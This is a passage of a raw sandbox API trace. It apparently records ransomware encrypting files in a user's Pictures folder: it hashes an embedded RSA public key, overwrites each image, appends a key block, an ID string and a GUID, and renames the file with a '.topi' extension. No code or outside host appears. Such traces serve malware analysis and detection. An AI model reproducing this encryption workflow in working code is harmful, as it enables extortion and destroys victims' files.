KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.500] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.500] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.500] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.500] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.501] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.501] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.501] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.501] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.501] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.501] GetLastError () returned 0x0 [0095.501] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.501] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.501] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.501] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.502] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.502] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18c50) returned 0x9a06a00 [0095.502] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.503] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.503] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1d10 [0095.503] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94c8 [0095.503] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1d58 [0095.503] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94e0 [0095.503] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9510 [0095.503] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.503] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9528 [0095.503] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.503] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.503] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.503] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.503] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9510 | out: hHeap=0x680000) returned 1 [0095.503] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9528 | out: hHeap=0x680000) returned 1 [0095.503] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.503] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.504] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9528 [0095.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9510 [0095.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.504] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.504] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9528 | out: hHeap=0x680000) returned 1 [0095.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9510 | out: hHeap=0x680000) returned 1 [0095.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.505] GetCurrentThreadId () returned 0x8c4 [0095.505] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.505] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6460 [0095.505] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.505] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.505] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.505] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.505] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.505] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.505] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.505] GetCurrentThreadId () returned 0x8c4 [0095.505] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.505] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.506] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.506] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.506] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.506] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.506] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9510 [0095.506] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.506] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9528 [0095.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d94f8 [0095.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9540 [0095.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0095.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.507] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.507] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9510 | out: hHeap=0x680000) returned 1 [0095.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9510 [0095.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.508] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.508] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.509] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.509] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9510 | out: hHeap=0x680000) returned 1 [0095.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.510] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.510] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9540 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9528 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94f8 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.511] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d94e0 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1d58 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.512] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.512] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x18c42, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x18c42, lpOverlapped=0x0) returned 1 [0095.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.513] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x18c47, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.513] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.513] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.513] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.513] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.514] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.514] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.514] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.514] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.514] CloseHandle (hObject=0x6a8) returned 1 [0095.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.516] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x880) returned 0x31cf750 [0095.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.516] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eAID79ide.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\eaid79ide.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\eAID79ide.jpg.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\eaid79ide.jpg.topi")) returned 1 [0095.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.516] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.518] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.518] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8eb340, ftCreationTime.dwHighDateTime=0x1d5c044, ftLastAccessTime.dwLowDateTime=0x7e76fca0, ftLastAccessTime.dwHighDateTime=0x1d5bbcb, ftLastWriteTime.dwLowDateTime=0x7e76fca0, ftLastWriteTime.dwHighDateTime=0x1d5bbcb, nFileSizeHigh=0x0, nFileSizeLow=0xfe99, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="i0_91MD8mP.gif", cAlternateFileName="I0_91M~1.GIF")) returned 1 [0095.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0095.518] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.519] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\i0_91MD8mP.gif") returned=".gif" [0095.519] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\i0_91MD8mP.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\i0_91md8mp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.519] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=65177) returned 1 [0095.519] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.524] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xfe73, lpNewFilePointer=0x0, 